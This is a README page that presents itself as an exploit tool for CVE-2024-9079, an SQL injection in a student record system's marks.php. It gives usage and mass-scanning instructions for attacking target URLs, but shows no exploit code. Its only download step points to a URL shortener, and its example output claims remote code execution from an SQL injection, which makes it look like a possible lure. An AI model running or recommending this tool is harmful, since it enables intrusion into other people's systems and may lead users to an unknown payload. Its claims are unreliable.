CVE-2024-9079 PoC — code-projects Student Record System marks.php sql injection

Source

Associated Vulnerability

Readme

# 🛠 CVE-2024-9079 Exploit

## 🌟 Description
CVE-2024-9079
A vulnerability was found in code-projects Student Record System 1.0 and classified as critical. This issue affects some unknown processing of the file /marks.php. The manipulation of the argument coursename leads to sql injection. The attack may be initiated remotely. The exploit can be purchased and used.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/JY4pv)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-9079
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-9079.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 🗒 Affected Versions

Student Record System = 1.0

## 📈 CVSS Information

File Snapshot

 [4.0K]  /data/pocs/3cc0af5cc034f64affb489d1a7cd2e24704a9636
└── [1.7K]  README.md

0 directories, 1 file

Remarks